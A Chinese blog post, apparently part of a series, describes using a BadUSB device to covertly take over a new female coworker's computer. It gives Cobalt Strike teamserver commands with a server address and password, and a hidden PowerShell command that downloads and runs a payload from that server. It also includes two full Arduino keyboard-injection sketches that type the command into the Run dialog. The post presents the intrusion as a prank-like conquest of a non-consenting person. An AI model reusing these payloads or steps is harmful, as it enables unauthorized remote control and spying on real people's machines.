渗透小姐姐的心系列-控制小姐姐电脑(1)

简介: 渗透小姐姐的心系列-控制小姐姐电脑(1)

背景

 

公司前几天刚入职了一个小姐姐,看到她的第一眼,我发现我恋爱了。

所以我一定要拿到她的电脑权限!!!!



 

Badusb:伪造计算机交互设备

 

 

1.部署cs

服务器:

通过screen启动cs服务端

screnn -dmS xiaojiejie
screnn -r xiaojiejie
./teamserver 111.229.77.212 520520

 

 


 

客户端启动

 


java -Dfile.encoding=UTF-8 -javaagent:CobaltStrikeCN.jar -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -jar cobaltstrike.jar

 

客户端连接

 

c9ce9e9d76cf77b1f73304003d62f2e2_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


配置监听器:

 


 

生成后门下载链接

 


 

 

 

复制出


powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://111.229.77.212:80/xiaojiejie'))"

 

安装Arduino IDE(回复公众号(渗透小姐姐的心)查看下载链接。)

 


设置开发版和编程器

 

 

编写代码

#include<Keyboard.h>
void setup(){
Keyboard.begin();
delay(1000);
Keyboard.press(KEY_LEFT_GUI);
Keyboard.press('r');
delay(500);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
delay(500);
Keyboard.println("powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://111.229.77.212:80/xiaojiejie'))"");
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
delay(500);
Keyboard.end();
}
void loop()
{
}

 


指令过长

重新生成payload

 


保存到桌面

上传到服务器

使用python实现下载服务


python -m SimpleHTTPServer 8080

 


 

写入代码

#include<Keyboard.h>
void setup(){
Keyboard.begin();
delay(1000);
Keyboard.press(KEY_LEFT_GUI);
Keyboard.press('r');
delay(500);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
delay(500);
Keyboard.println("cmd.exe /c powershell.exe IEX(New-ObjectNet.WebClient).DownloadString('http://111.229.77.212:8080/xiaojiejie.ps1')");
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
delay(500);
Keyboard.end();
}
void loop()
{
}

验证

 


 

取得开发版信息

 

硬件插入电脑

打开Arduino IDE

工具->->选择Arduino Leonardo

工具->Port->选择COM* (Arduino Leonardo)

现在可以看到IDE右下角出现Arduino Leonardo on COM*

 

4924f4c4f3be54ba30d6ab5365a73f3c_640_wx_fmt=gif&wxfrom=5&wx_lazy=1.gif

上传



 

插上小姐姐的电脑,成功上线!

 

 


相关文章
|
8月前
|
存储 监控 网络协议
远程控制与操作:局域网企业监控软件的远程管理代码
随着科技的飞速发展,企业管理也变得更加智能和便捷。在局域网内,局域网企业监控软件的远程管理代码扮演着重要的角色,使管理员能够实时远程控制和操作监控系统。本文将深入探讨这些代码的实现原理,并通过多个例子展示其功能和效果。
272 0
|
4月前
|
算法
鬼手操控着你的手机?大模型GUI智能体易遭受环境劫持
【9月更文挑战第27天】近年来,随着人工智能技术的发展,多模态大语言模型(MLLM)在图形用户界面(GUI)中广泛应用,提升了交互体验。然而,最新研究《环境警示:多模态智能体易受环境干扰》指出,这些智能体可能因环境干扰而行为失准。作者通过实验展示了即使是强大模型也会受无关因素影响,导致不可靠或不可预测的行为。研究还证实,通过环境注入攻击可进一步加剧此问题。尽管如此,多模态GUI智能体依然潜力巨大,未来需改进感知能力和算法以增强鲁棒性,解决环境干扰问题。论文详细内容见:https://arxiv.org/abs/2408.02544。
60 8
|
7月前
|
安全
黑客是如何通过电脑打开汽车车门的
该文探讨了现实生活中的黑客入侵汽车技术。文中提到,早期汽车开锁依赖静态代码,易受重放攻击,即黑客记录无线电代码后可重播解锁。为解决此问题,厂商引入了滚动代码,每次按键都会发送不同的代码,增加了安全性。
47 0
|
云安全 安全 大数据
阿里云定位僵尸网络 2人控制3000台肉鸡
本文讲的是阿里云定位僵尸网络 2人控制3000台肉鸡【IT168资讯】今年6月,阿里云云盾安全团队在云计算安全日常监测中捕获了一个恶意软件样本。通过对控制指令的分析,顺藤摸瓜找到了活跃在公共互联网的一个3000台“肉鸡”规模的僵尸网络。
2844 0
|
数据安全/隐私保护 iOS开发 MacOS
新型MacOS勒索软件:正在伪装成PS软件传播
本文讲的是新型MacOS勒索软件:正在伪装成PS软件传播,几天前, ESET公司的安全专家发现了一种新型的MacOS勒索软件,属于非常珍贵的物种。这一勒索软件被命名为OSX/Filecoder.E,主要是通过bittorrent网站攻击MacOS用户。
1431 0